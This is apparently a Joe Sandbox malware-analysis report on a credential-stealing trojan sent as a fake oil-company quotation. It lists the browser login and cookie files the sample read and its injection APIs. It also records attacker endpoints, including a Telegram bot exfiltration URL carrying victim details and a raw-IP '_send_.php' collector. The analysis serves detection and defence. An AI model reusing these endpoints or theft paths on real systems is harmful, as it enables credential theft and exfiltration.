              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: _Company.exe, 00000002.00000002.4646327254.0000000001147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\_Company.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_05569548 LdrInitializeThunk,2_2_05569548
              Source: C:\Users\user\Desktop\_Company.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: 1.2._Company.exe.33736cc.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
              Source: 1.2._Company.exe.33736cc.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
              Source: 1.2._Company.exe.33736cc.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
              Source: C:\Users\user\Desktop\_Company.exeMemory written: C:\Users\user\Desktop\_Company.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess created: C:\Users\user\Desktop\_Company.exe "C:\Users\user\Desktop\_Company.exe"Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Users\user\Desktop\_Company.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Users\user\Desktop\_Company.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              DLL Side-Loading
              111
              Process Injection
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Email Collection
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Security Software Discovery
              Remote Desktop Protocol11
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
              Process Injection
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              3
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS31
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
              Obfuscated Files or Information
              LSA Secrets1
              Application Window Discovery
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Software Packing
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Timestomp
              DCSync13
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              _Company.exe47%ReversingLabsWin32.Trojan.Generic
              _Company.exe100%AviraHEUR/AGEN.1309847
              _Company.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              104.21.67.152
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  158.101.44.242
                  truefalse
                    high
                    smtp.hostinger.com
                    172.65.255.143
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2019/12/2024%20/%2015:38:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            http://checkip.dyndns.org/false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/_Company.exe, 00000002.00000002.4647934767.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000032D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtab_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://smtp.hostinger.com_Company.exe, 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000332B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/lB_Company.exe, 00000002.00000002.4647934767.00000000032E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.org_Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=en_Company.exe, 00000002.00000002.4647934767.00000000032B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            high
                                                            http://aborters.duckdns.org:8081_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ac.ecosia.org/autocomplete?q=_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://51.38.247.67:8081/_send_.php?L_Company.exe, 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://anotherarmy.dns.army:8081_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://checkip.dyndns.org/q_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://chrome.google.com/webstore?hl=enlB_Company.exe, 00000002.00000002.4647934767.00000000032B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003199000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.org_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000316F000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000031DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name_Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000316F000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        api.telegram.orgUnited Kingdom
                                                                                        62041TELEGRAMRUfalse
                                                                                        104.21.67.152
                                                                                        reallyfreegeoip.orgUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        158.101.44.242
                                                                                        checkip.dyndns.comUnited States
                                                                                        31898ORACLE-BMC-31898USfalse
                                                                                        172.65.255.143
                                                                                        smtp.hostinger.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1577705
                                                                                        Start date and time:2024-12-18 17:06:13 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 37s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:17
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:_Company.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:QTN_Detailed_Schedule_for_Balance_Activities_in_Terminal_5_Area_By_Abu_Dhabi_National_Oil_Company.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/0@4/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 112
                                                                                        • Number of non-executed functions: 20
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.199.58.43, 104.126.37.163, 13.107.246.63, 23.218.208.109, 150.171.28.10, 104.126.37.160, 4.175.87.197
                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • VT rate limit hit for: _Company.exe
                                                                                        TimeTypeDescription
                                                                                        11:07:18API Interceptor10368677x Sleep call for process: _Company.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
